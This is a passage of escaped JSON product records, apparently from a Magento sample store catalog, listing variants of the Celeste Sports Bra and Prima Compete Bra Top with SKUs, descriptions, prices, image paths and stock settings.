\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1587\":{\"sku\":\"WB03-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-XL-Red\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1588\":{\"sku\":\"WB03-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-XL-Yellow\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1589\":{\"sku\":\"WB03\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Bra,material=Cocona&reg; performance fabric|Organic Cotton,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WB03-XS-Green,size=XS,color=Green|sku=WB03-XS-Red,size=XS,color=Red|sku=WB03-XS-Yellow,size=XS,color=Yellow|sku=WB03-S-Green,size=S,color=Green|sku=WB03-S-Red,size=S,color=Red|sku=WB03-S-Yellow,size=S,color=Yellow|sku=WB03-M-Green,size=M,color=Green|sku=WB03-M-Red,size=M,color=Red|sku=WB03-M-Yellow,size=M,color=Yellow|sku=WB03-L-Green,size=L,color=Green|sku=WB03-L-Red,size=L,color=Red|sku=WB03-L-Yellow,size=L,color=Yellow|sku=WB03-XL-Green,size=XL,color=Green|sku=WB03-XL-Red,size=XL,color=Red|sku=WB03-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb03-green_alt1.jpg,\\/w\\/b\\/wb03-green_back.jpg\",\"image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb03-green_alt1.jpg,\\/w\\/b\\/wb03-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Bra\",\"material\":\"Cocona&reg; performance fabric|Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"1590\":{\"sku\":\"WB04-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-XS-Blue\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb04-blue-0.jpg,\\/w\\/b\\/wb04-blue_alt1.jpg,\\/w\\/b\\/wb04-blue_back.jpg\",\"image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb04-blue-0.jpg,\\/w\\/b\\/wb04-blue_alt1.jpg,\\/w\\/b\\/wb04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1591\":{\"sku\":\"WB04-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-XS-Purple\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1592\":{\"sku\":\"WB04-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-XS-Yellow\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"1593\":{\"sku\":\"WB04-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-S-Blue\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb04-blue-0.jpg,\\/w\\/b\\/wb04-blue_alt1.jpg,\\/w\\/b\\/wb04-blue_back.jpg\",\"image\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb04-blue-0.jpg,\\/w\\/b\\/wb04-blue_alt1.jpg,\\/w\\/b\\/wb04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1594\":{\"sku\":\"WB04-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-S-Purple\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1595\":{\"sku\":\"WB04-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Prima Compete Bra Top-S-Yellow\",\"description\":\"<p>Pull on the Prima Compete Bra Top and you\'ll love the fabric: soft, stretchy, and ultra lightweight. But you\'ll also love the racerback cut, for freer movement through all your athletic feats. <br \\/>`<br \\/>&bull; Colorblocked details.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"prima-compete-bra-top-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb04-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_q